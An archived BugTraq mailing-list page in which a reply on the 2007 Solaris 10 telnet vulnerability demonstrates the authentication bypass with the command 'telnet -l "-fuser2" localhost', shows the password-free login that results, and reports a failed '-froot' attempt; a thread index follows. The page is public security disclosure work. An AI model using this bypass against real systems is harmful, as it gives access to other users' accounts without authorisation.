BugTraq
Solaris telnet vulnberability - how many on your network? Feb 12 2007 06:00AM
Gadi Evron (ge linuxbox org) (2 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 14 2007 10:41AM
Leandro Gelasi (leandro gelasi tiscali it)
On Monday 12 February 2007 07:00, Gadi Evron wrote:
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
Confirmed.

If the server permits logins from outside (maybe via SSH only - protection
provided by a local or network) and has telnetd enabled any user can login
as other user with no password. I mean:

$> ssh user1 (at) sol10_server (dot) dom [email concealed]
password: ********
user1@sol10_server>telnet -l "-fuser2" localhost
<no pass required>
user2@sol10_server>

On my Solaris 10 server I wasn't able to obtain root privileges this way,
trying:

$>telnet -l "-froot" localhost (or IP from the local net)

I got:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Not on system console
Connection to localhost closed by foreign host.

It seems that root cannot login on not-system consoles. This server hosts
SunRay Server Software 3.1, maybe the different configuration is coming from
there.

See you

LG

--
************************************************************************
**
Leandro Gelasi
email : leandro.gelasi (at) tiscali (dot) it [email concealed]
Gilles Villeneuve will live forever
************************************************************************
**

[ reply ]
RE: Solaris telnet vulnberability - how many on your network? Feb 13 2007 06:10AM
Oliver Friedrichs (oliver_friedrichs symantec com) (2 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 06:11PM
Casper Dik Sun COM (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 08:49PM
Gadi Evron (ge linuxbox org) (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 08:53PM
Casper Dik Sun COM (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 08:56PM
Gadi Evron (ge linuxbox org) (2 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 09:00PM
Casper Dik Sun COM (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 14 2007 12:16AM
Joe Shamblin (wjs cs duke edu) (3 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 15 2007 06:51AM
Darren Reed (avalon caligula anu edu au)
RE: [Full-disclosure] Solaris telnet vulnberability - how many onyour network? Feb 14 2007 02:25PM
David Taylor (ltr isc upenn edu)
Re: Solaris telnet vulnberability - how many on your network? Feb 14 2007 07:40AM
Casper Dik Sun COM
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 08:59PM
Gadi Evron (ge linuxbox org)
RE: Solaris telnet vulnberability - how many on your network? Feb 13 2007 09:46AM
Gadi Evron (ge linuxbox org) (2 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 08:19PM
georg oppenberg deu mci com
RE: Solaris telnet vulnberability - how many on your network? Feb 13 2007 07:36PM
Michal Zalewski (lcamtuf dione ids pl) (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 09:01PM
Casper Dik Sun COM (2 replies)
Re[2]: Solaris telnet vulnberability - how many on your network? Feb 14 2007 12:32AM
Thierry Zoller (Thierry Zoller lu) (2 replies)
Re: Re[2]: Solaris telnet vulnberability - how many on your network? Feb 15 2007 06:49AM
Darren Reed (avalon caligula anu edu au) (2 replies)
Reflections on Trusting Trust [was: Re: Solaris telnet ...] Feb 16 2007 01:19AM
Gadi Evron (ge linuxbox org)
RE: Re[2]: Solaris telnet vulnberability - how many on your network? Feb 15 2007 07:10PM
Evans, Thomas (ttevans hawkcorp net)
RE: Re[2]: Solaris telnet vulnberability - how many on your network? Feb 14 2007 09:28PM
Roger A. Grimes (roger banneretcs com) (1 replies)
RE: Re[2]: Solaris telnet vulnberability - how many on your network? Feb 15 2007 12:55AM
Gadi Evron (ge linuxbox org)
Re: Solaris telnet vulnberability - how many on your network? Feb 13 2007 09:08PM
Gadi Evron (ge linuxbox org) (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 14 2007 09:15PM
Damien Miller (djm mindrot org) (1 replies)
Re: Solaris telnet vulnberability - how many on your network? Feb 15 2007 12:50AM
Gadi Evron (ge linuxbox org)


 

Privacy Statement
Copyright 2010, SecurityFocus